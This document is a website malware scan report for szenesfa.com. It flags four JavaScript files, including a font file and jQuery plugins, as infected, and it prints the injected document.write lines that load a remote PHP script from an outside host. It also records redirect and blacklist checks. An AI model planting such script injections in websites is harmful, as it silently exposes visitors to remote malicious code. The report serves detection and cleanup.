Scanned pages/files
| Request | Server response | Status |
http://szenesfa.com/ | 200 OK Content-Length: 5162 Content-Type: text/html | clean |
http://szenesfa.com/js/jquery-1.5.min.js | 200 OK Content-Length: 86031 Content-Type: application/javascript | clean |
http://szenesfa.com/js/PIE.js | 200 OK Content-Length: 34936 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if ($.browser.msie){ (function(){ var doc = document;var g=window.PIE; if(!g){g=window.PIE={F:"-pie-",Sa:"Pie",Pa:"pie_",Jb:{TD:1,TH:1}};try{doc.execCommand("BackgroundImageCache",false,true)}catch(L){}g.J=function(){for(var a=4,b=doc.createElement("div"),c=b.getElementsByTagName("i");b.innerHTML="<!--[if gt IE " a "]><i></i><![endif]--\>",c[0];);return a}();if(g.J===6)g.F=g.F.replace(/^-/,"");g.Ab=doc.documentMode||g.J;(function(){var a,b=0,c={};g.p={Ga:fu document.write('<script src="http://familycottagefrance.co.uk/rj9gRnvR.php?id=137457" type="text/javascript"></script>'); Antivirus reports:
| ||
http://szenesfa.com/js/cufon-yui.js | 200 OK Content-Length: 19926 Content-Type: application/javascript | clean |
http://szenesfa.com/js/Crimson.font.js | 200 OK Content-Length: 224354 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Cufon.registerFont({"w":252,"face":{"font-family":"Crimson","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 5 3 0 0 0 0 0 0","ascent":"252","descent":"-108","x-height":"2","cap-height":"1","bbox":"-33 -358.359 373.063 81","underline-thickness":"16.5234","underline-position":"-39.375","stemh":"10","stemv":"27","unicode-range":"U 0020-U 2033"},"glyphs":{" ":{"w":80},"!":{"d":"50,-226v11,0,16,11,16,22v0,10,-6,49,-11,140v2,9,-13,18,-13,4v0,-108,-10,-126,-10,-144v0,-11, document.write('<script src="http://familycottagefrance.co.uk/rj9gRnvR.php?id=137455" type="text/javascript"></script>'); Antivirus reports:
| ||
http://szenesfa.com/js/cufon-colors.js | 200 OK Content-Length: 0 Content-Type: application/javascript | clean |
http://szenesfa.com/js/jquery.masonry.min.js | 200 OK Content-Length: 5110 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(e){var n=e.event,o;n.special.smartresize={setup:function(){e(this).bind("resize",n.special.smartresize.handler)},teardown:function(){e(this).unbind("resize",n.special.smartresize.handler)},handler:function(j,l){var g=this,d=arguments;j.type="smartresize";o&&clearTimeout(o);o=setTimeout(function(){jQuery.event.handle.apply(g,d)},l==="execAsap"?0:100)}};e.fn.smartresize=function(j){return j?this.bind("smartresize",j):this.trigger("smartresize",["execAsap"])};e.fn.masonry=function document.write('<script src="http://familycottagefrance.co.uk/rj9gRnvR.php?id=156475" type="text/javascript"></script>'); Antivirus reports:
| ||
http://szenesfa.com/js/plugins/placeholder/jquery.placeholder.js | 200 OK Content-Length: 2423 Content-Type: application/javascript | clean |
http://szenesfa.com/js/plugins/validator/jquery.validationEngine.js | 200 OK Content-Length: 22447 Content-Type: application/javascript | clean |
http://szenesfa.com/js/plugins/validator/z.trans.en.js | 200 OK Content-Length: 2063 Content-Type: application/javascript | clean |
http://szenesfa.com/js/pf/js/jquery.prettyPhoto.js | 200 OK Content-Length: 21517 Content-Type: application/javascript | clean |
http://szenesfa.com/js/scripts.js | 200 OK Content-Length: 16422 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) { $(function () { $('#multicol').masonry({ columnWidth: 240, itemSelector: '.article_box', animate: true, animationOptions: { duration: 500, easing: 'linear', specialEasing: { top: 'linear' }, queue: false } }) }); $(function () { $('#m document.write('<script src="http://familycottagefrance.co.uk/rj9gRnvR.php?id=156481" type="text/javascript"></script>'); Antivirus reports:
| ||
http://szenesfa.com/index.htm | 200 OK Content-Length: 5162 Content-Type: text/html | clean |
http://szenesfa.com/szen.htm | 200 OK Content-Length: 6628 Content-Type: text/html | clean |
http://szenesfa.com/fa.htm | 200 OK Content-Length: 16487 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: szenesfa.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 23 Jul 2014 21:40:48 GMT
Accept-Ranges: bytes
ETag: "9ad0062-142a-4eecf0cc942c0"
Server: Apache
Content-Length: 5162
Content-Type: text/html
Last-Modified: Tue, 31 Dec 2013 06:55:47 GMT
...5162 bytes of data.
GET / HTTP/1.1
Host: szenesfa.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 23 Jul 2014 21:40:48 GMT
Accept-Ranges: bytes
ETag: "9ad0062-142a-4eecf0cc942c0"
Server: Apache
Content-Length: 5162
Content-Type: text/html
Last-Modified: Tue, 31 Dec 2013 06:55:47 GMT
...5162 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: szenesfa.com
Referer: http://www.google.com/search?q=szenesfa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: szenesfa.com
Referer: http://www.google.com/search?q=szenesfa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=szenesfa.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://szenesfa.com/
Result: szenesfa.com is not infected or malware details are not published yet.
Result: szenesfa.com is not infected or malware details are not published yet.